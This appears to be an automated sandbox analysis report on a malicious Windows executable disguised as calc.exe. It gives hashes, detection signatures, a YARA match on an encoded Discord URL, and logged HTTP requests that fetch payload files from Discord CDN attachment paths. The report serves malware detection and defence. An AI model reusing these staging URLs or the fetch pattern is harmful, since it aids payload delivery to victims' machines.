Loading ...

Play interactive tourEdit tour

Windows Analysis Report calc.exe

Overview

General Information

Sample Name:calc.exe
Analysis ID:510683
MD5:ce76ae9d476b9c0daa25daf4c6dd4909
SHA1:f574aa3bbe554363a6f6d1d648c31505bf92bfe5
SHA256:05f3ac7f197b690f306c521b658c935fbf057d737ad6791cee6e2553b87d090b
Infos:

Most interesting Screenshot:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Found detection on Joe Sandbox Cloud Basic with higher score
Multi AV Scanner detection for submitted file
Machine Learning detection for sample
.NET source code contains potential unpacker
AV process strings found (often used to terminate AV products)
Queries the volume information (name, serial number etc) of a device
Yara signature match
One or more processes crash
PE file contains strange resources
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
IP address seen in connection with other malware
Enables debug privileges

Classification

Process Tree

  • System is w10x64
  • calc.exe (PID: 2952 cmdline: 'C:\Users\user\Desktop\calc.exe' MD5: CE76AE9D476B9C0DAA25DAF4C6DD4909)
    • conhost.exe (PID: 3100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • WerFault.exe (PID: 5944 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2952 -s 2104 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
calc.exeSUSP_Encoded_Discord_Attachment_Oct21_1Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x158e:$enc_r01: stnemhcatta/moc.ppadrocsid.ndc

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000000.252642988.0000000000322000.00000002.00020000.sdmpSUSP_Encoded_Discord_Attachment_Oct21_1Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x138e:$enc_r01: stnemhcatta/moc.ppadrocsid.ndc
00000000.00000002.291985012.0000000000322000.00000002.00020000.sdmpSUSP_Encoded_Discord_Attachment_Oct21_1Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x138e:$enc_r01: stnemhcatta/moc.ppadrocsid.ndc
00000000.00000000.245005606.0000000000322000.00000002.00020000.sdmpSUSP_Encoded_Discord_Attachment_Oct21_1Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x138e:$enc_r01: stnemhcatta/moc.ppadrocsid.ndc
00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpSUSP_Encoded_Discord_Attachment_Oct21_1Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x10440:$enc_r01: stnemhcatta/moc.ppadrocsid.ndc
  • 0x10504:$enc_r01: stnemhcatta/moc.ppadrocsid.ndc
00000000.00000002.293201383.0000000002677000.00000004.00000001.sdmpSUSP_Encoded_Discord_Attachment_Oct21_1Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x66a:$enc_r01: stnemhcatta/moc.ppadrocsid.ndc
  • 0x736:$enc_r01: stnemhcatta/moc.ppadrocsid.ndc
Click to see the 8 entries

Unpacked PEs

SourceRuleDescriptionAuthorStrings
0.0.calc.exe.320000.1.unpackSUSP_Encoded_Discord_Attachment_Oct21_1Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x158e:$enc_r01: stnemhcatta/moc.ppadrocsid.ndc
0.0.calc.exe.320000.0.unpackSUSP_Encoded_Discord_Attachment_Oct21_1Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x158e:$enc_r01: stnemhcatta/moc.ppadrocsid.ndc
0.0.calc.exe.320000.2.unpackSUSP_Encoded_Discord_Attachment_Oct21_1Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x158e:$enc_r01: stnemhcatta/moc.ppadrocsid.ndc
0.2.calc.exe.320000.0.unpackSUSP_Encoded_Discord_Attachment_Oct21_1Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x158e:$enc_r01: stnemhcatta/moc.ppadrocsid.ndc

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus / Scanner detection for submitted sampleShow sources
Source: calc.exeAvira: detected
Multi AV Scanner detection for submitted fileShow sources
Source: calc.exeVirustotal: Detection: 54%Perma Link
Source: calc.exeReversingLabs: Detection: 26%
Machine Learning detection for sampleShow sources
Source: calc.exeJoe Sandbox ML: detected
Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: calc.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Source: Binary string: rsaenh.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: System.ni.pdb% source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000005.00000003.260801117.0000000002F4D000.00000004.00000001.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000005.00000003.267702128.0000000005460000.00000004.00000040.sdmp
Source: Binary string: mskeyprotect.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000005.00000003.267591215.0000000005491000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 00000005.00000003.267591215.0000000005491000.00000004.00000001.sdmp
Source: Binary string: rtutils.pdb& source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: dnsapi.pdb2 source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: winnsi.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: clr.pdb source: WerFault.exe, 00000005.00000003.267702128.0000000005460000.00000004.00000040.sdmp
Source: Binary string: cryptsp.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000005.00000003.267591215.0000000005491000.00000004.00000001.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: crypt32.pdb4 source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.ni.pdb> source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: schannel.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 00000005.00000002.291489220.0000000005750000.00000004.00000001.sdmp
Source: Binary string: ws2_32.pdbh source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000005.00000003.267591215.0000000005491000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp, WER2DC6.tmp.dmp.5.dr
Source: Binary string: rasadhlp.pdb~ source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: System.Xml.pdbx source: WerFault.exe, 00000005.00000002.291489220.0000000005750000.00000004.00000001.sdmp
Source: Binary string: System.ni.pdbT3Rm source: WerFault.exe, 00000005.00000002.291489220.0000000005750000.00000004.00000001.sdmp
Source: Binary string: System.Configuration.pdbHL source: WER2DC6.tmp.dmp.5.dr
Source: Binary string: mscoree.pdb source: WerFault.exe, 00000005.00000003.267591215.0000000005491000.00000004.00000001.sdmp
Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdbk source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: nsi.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb:0 source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: cryptsp.pdb= source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: gpapi.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdbRSDS source: WER2DC6.tmp.dmp.5.dr
Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp, WER2DC6.tmp.dmp.5.dr
Source: Binary string: ole32.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 00000005.00000002.291489220.0000000005750000.00000004.00000001.sdmp
Source: Binary string: msasn1.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.pdb> source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp, WER2DC6.tmp.dmp.5.dr
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000005.00000003.260801117.0000000002F4D000.00000004.00000001.sdmp
Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER2DC6.tmp.dmp.5.dr
Source: Binary string: kDC:\Users\user\Desktop\calc.pdb source: calc.exe, 00000000.00000000.252775219.00000000006F8000.00000004.00000001.sdmp
Source: Binary string: ncrypt.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: secur32.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000005.00000003.267591215.0000000005491000.00000004.00000001.sdmp
Source: Binary string: System.Xml.ni.pdbRSDS source: WER2DC6.tmp.dmp.5.dr
Source: Binary string: System.pdb> source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: rasadhlp.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: System.Xml.ni.pdb> source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: System.Core.ni.pdbRSDSD source: WER2DC6.tmp.dmp.5.dr
Source: Binary string: winhttp.pdbZ source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: diasymreader.pdb_ source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: System.pdbMZ@ source: WER2DC6.tmp.dmp.5.dr
Source: Binary string: mscoreei.pdbk source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdbx source: WerFault.exe, 00000005.00000002.291489220.0000000005750000.00000004.00000001.sdmp
Source: Binary string: winnsi.pdbd source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: sechost.pdbG source: WerFault.exe, 00000005.00000003.267591215.0000000005491000.00000004.00000001.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000005.00000003.267702128.0000000005460000.00000004.00000040.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp, WER2DC6.tmp.dmp.5.dr
Source: Binary string: shell32.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: dnsapi.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: rasapi32.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdbb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 00000005.00000002.291489220.0000000005750000.00000004.00000001.sdmp
Source: Binary string: diasymreader.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: winhttp.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: ntasn1.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: rtutils.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: System.pdbx source: WerFault.exe, 00000005.00000002.291489220.0000000005750000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000005.00000003.260565634.0000000002F42000.00000004.00000001.sdmp
Source: Binary string: wmswsock.pdbV source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: System.Core.ni.pdb> source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp, WER2DC6.tmp.dmp.5.dr
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000005.00000003.267702128.0000000005460000.00000004.00000040.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 00000005.00000003.267591215.0000000005491000.00000004.00000001.sdmp
Source: Binary string: System.ni.pdbRSDS source: WER2DC6.tmp.dmp.5.dr
Source: Binary string: clrjit.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: rasman.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: System.Core.pdb> source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp, WER2DC6.tmp.dmp.5.dr
Source: Binary string: ncryptsslp.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: wmswsock.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: version.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: System.Xml.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp, WER2DC6.tmp.dmp.5.dr
Source: Binary string: System.pdb source: calc.exe, 00000000.00000000.254647015.0000000002729000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp, WER2DC6.tmp.dmp.5.dr
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000005.00000003.267702128.0000000005460000.00000004.00000040.sdmp
Source: Binary string: psapi.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: ntasn1.pdb* source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: C:\Users\jpint\OneDrive\Desktop\BuilderBot\BuilderBot\bin\Release\stub\un_priv\DarkEdition\obj\Release\calc.pdb source: calc.exe
Source: Binary string: System.Core.pdbx source: WerFault.exe, 00000005.00000002.291489220.0000000005750000.00000004.00000001.sdmp
Source: Binary string: mscoreei.pdb source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000005.00000003.260585475.0000000002F53000.00000004.00000001.sdmp
Source: Binary string: calc.pdb source: WerFault.exe, 00000005.00000003.267591215.0000000005491000.00000004.00000001.sdmp, WER2DC6.tmp.dmp.5.dr
Source: Binary string: combase.pdbk source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: System.Core.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp, WER2DC6.tmp.dmp.5.dr
Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 00000005.00000003.267521490.000000000546A000.00000004.00000040.sdmp
Source: Binary string: System.Core.pdbh source: WER2DC6.tmp.dmp.5.dr
Source: Binary string: System.ni.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp, WER2DC6.tmp.dmp.5.dr
Source: Binary string: cryptbase.pdbk source: WerFault.exe, 00000005.00000003.267503853.0000000005462000.00000004.00000040.sdmp
Source: Binary string: crypt32.pdb source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdb@ source: WerFault.exe, 00000005.00000003.267465154.000000000546E000.00000004.00000040.sdmp

Networking:

barindex
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Users\user\Desktop\calc.exeDomain query: cdn.discordapp.com
Source: C:\Users\user\Desktop\calc.exeNetwork Connect: 162.159.135.233 443
Source: global trafficHTTP traffic detected: GET /attachments/897402450376536075/897465559711633408/8NMrqq.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)Host: cdn.discordapp.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /attachments/897223707649515602/897228595318124554/ascii_ART.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)Host: cdn.discordapp.com
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox ViewIP Address: 162.159.135.233 162.159.135.233
Source: Joe Sandbox ViewIP Address: 162.159.135.233 162.159.135.233
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 28 Oct 2021 02:56:06 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 223Connection: closeCF-Ray: 6a50e397b8ab1756-FRACache-Control: private, max-age=0Expires: Thu, 28 Oct 2021 02:56:06 GMTVary: Accept-EncodingCF-Cache-Status: MISSAlt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"X-GUploader-UploadID: ADPycdso1L-ylGX3bmenRtNOQmdon87QxmC7cXUyPENI7fDPUtJpk_9x5Bbi4ZgqkkYUdWdLYHwGtl2nhQu3WyOEx-8lP-t6kAX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=X0aOWmo3%2Bd2J5p5kYEmgATNoxtwSQamhuDwF0HfeVv3A%2FULL0goDlzj8myWfYgoN8Wz%2BTegRCRL%2FE6v2%2BH8q99WsdaRWi95pVvtRlzG%2F%2B%2BEfjTXgU25DZRc%2Botur%2FhsNBmyD9A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
Source: calc.exe, 00000000.00000002.293292330.0000000002691000.00000004.00000001.sdmpString found in binary or memory: http://cdn.discordapp.com
Source: WerFault.exe, 00000005.00000003.289499864.0000000004EDB000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: WerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
Source: WerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
Source: WerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
Source: WerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
Source: WerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
Source: WerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
Source: WerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
Source: calc.exe, 00000000.00000002.293201383.0000000002677000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: WerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
Source: WerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
Source: WerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
Source: WerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
Source: WerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
Source: WerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
Source: WerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o
Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.d
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.di
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.dis
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.disc
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.disco
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discor
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discord
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discorda
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordap
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.c
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.co
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/a
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/at
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/att
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/atta
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attac
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attach
Source: calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachm
